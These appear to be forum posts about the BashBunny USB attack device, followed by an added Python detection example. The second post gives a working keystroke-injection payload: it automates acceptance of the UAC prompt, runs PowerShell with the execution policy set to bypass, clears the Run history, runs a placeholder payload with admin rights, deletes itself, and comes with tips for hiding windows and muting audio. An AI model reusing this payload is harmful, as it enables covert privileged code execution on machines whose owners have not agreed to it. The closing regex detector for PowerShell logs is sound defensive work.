Dracstic

  1. I'll keep that in mind. Running one script from the bashbunny would work great for quick jobs. Unfortunately the project I'm working on downloads and runs multiple executables and takes over an hour to complete. I know powershell scripts are copied to and run from memory but I was having issues with reliability after the script was started and the bashbunny was unplugged. With the two script setup I can unplug the bashbunny as soon as the first script closes.
  2. Hello all, I'm working on a project that requires multiple programs to run in parallel and when started individually each one triggers a UAC window. After some tinkering I came to the following solution and wanted to pass it along. Hope it helps.

     It starts with modifying the run.sh file in the extensions folder. I added the following code after the line "case "$os" in". This isn't strictly needed but I plan on using this in the future as well.

         WIN_UAC)
             QUACK GUI r
             QUACK DELAY 500
             QUACK STRING "$@"
             QUACK CTRL-SHIFT ENTER
             QUACK DELAY 1000
             QUACK ALT y
             QUACK ALT c
             QUACK LEFTARROW
             QUACK ENTER
             QUACK ENTER
             ;;

     I then created the BashBunny payload that would copy the file p2.ps1 from the switch# folder to the root of the USB storage and then call a quick powershell script using the new RUN WIN_UAC command that I just added.

         ######## INITIALIZATION ########
         LED SETUP
         GET SWITCH_POSITION
         ATTACKMODE HID STORAGE
         cp /root/udisk/payloads/$SWITCH_POSITION/p2.ps1 /root/udisk/p2.ps1

         ######## ATTACK ########
         LED ATTACK
         Q DELAY 1000
         RUN WIN_UAC "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\p1.ps1')"

         ######## FINISH ########
         LED FINISH

     The RUN WIN_UAC command will run the powershell script p1.ps1 with administrator privileges. p1.ps1 will copy p2.ps1 from the root of the BashBunny storage to a temporary folder on the PC and then run p2.ps1 with admin privileges. At this time the BashBunny can be unplugged.

         #Setup
         Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window
         Set-ExecutionPolicy bypass -force #disable UAC for this script
         Copy-Item ((gwmi win32_volume -f 'label=''BashBunny''').Name+'p2.ps1') -Destination $env:temp; Start-Process powershell (($env:temp)+'\p2.ps1') #Copy p2.ps1 from BashBunny storage root to temp folder on PC then run p2.ps1.

     P2.ps1 will run with admin privileges from the temporary folder and when its job is complete will delete itself and end the powershell process.

         #Setup
         Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window
         Set-ExecutionPolicy bypass -force #disable UAC for this script
         #Your payload here with all the privileges.
         Remove-Item (($env:temp)+'\p1.ps1') #Delete this script file
         Stop-Process -Id $PID #End this process
         #End
         ################################################################################################

     To add stealthiness I would add -windowstyle hidden to the Start-Process lines as well as turn down the volume or mute before the UAC window is triggered. What do you think? Drac.
  3. I get the same problem. I'm able to get around it by unplugging and replugging the Nano while wp6.sh is waiting to detect. It will come up after a few seconds and work fine after that.
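
For defenders, the two PowerShell stages in the second post leave recognisable text in PowerShell script block logging (event ID 4104). The following is an added detection example, not code from the poster or from the BashBunny project; it assumes script block logging is enabled and the events have been exported as records with hypothetical `RecordId` and `ScriptBlockText` keys, and the sample events are constructed.

```python
import re

# Indicators taken from the p1.ps1 / p2.ps1 text quoted in the second post.
INDICATORS = {
    "runmru_cleared": re.compile(r"Remove-ItemProperty\b.*\\Explorer\\RunMRU", re.I),
    "execpolicy_bypass": re.compile(r"Set-ExecutionPolicy\s+bypass\b", re.I),
    "volume_by_label": re.compile(r"win32_volume\s+-f\w*\s+'label=", re.I),
    "temp_script_launch": re.compile(r"Start-Process\s+powershell\b.*\$env:temp", re.I),
    "self_terminate": re.compile(r"Stop-Process\s+-Id\s+\$PID\b", re.I),
}

def match_indicators(script_block_text):
    """Return the sorted names of the indicators found in one script block."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(script_block_text))

def triage(events, threshold=2):
    """Return (RecordId, hits) for events with at least `threshold` indicators.

    One indicator alone is common in admin scripts; the combination is not.
    """
    findings = []
    for ev in events:
        hits = match_indicators(ev["ScriptBlockText"])
        if len(hits) >= threshold:
            findings.append((ev["RecordId"], hits))
    return findings

# Constructed sample events (not real logs); the key names are assumptions
# modelled on an export of PowerShell script block logging (event ID 4104).
SAMPLE_EVENTS = [
    {"RecordId": 101, "ScriptBlockText": r"""Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'
Set-ExecutionPolicy bypass -force
Copy-Item ((gwmi win32_volume -f 'label=''BashBunny''').Name+'p2.ps1') -Destination $env:temp
Start-Process powershell (($env:temp)+'\p2.ps1')"""},
    {"RecordId": 102, "ScriptBlockText": "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser\nGet-Volume"},
    {"RecordId": 103, "ScriptBlockText": r"""Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'
Set-ExecutionPolicy bypass -force
Stop-Process -Id $PID"""},
    {"RecordId": 104, "ScriptBlockText": "Get-Process notepad | Stop-Process\nStop-Process -Id $PID"},
]

if __name__ == "__main__":
    for record_id, hits in triage(SAMPLE_EVENTS):
        print(record_id, ", ".join(hits))
```

The threshold of two keeps a lone `Stop-Process -Id $PID` or a non-bypass `Set-ExecutionPolicy` call from raising a finding.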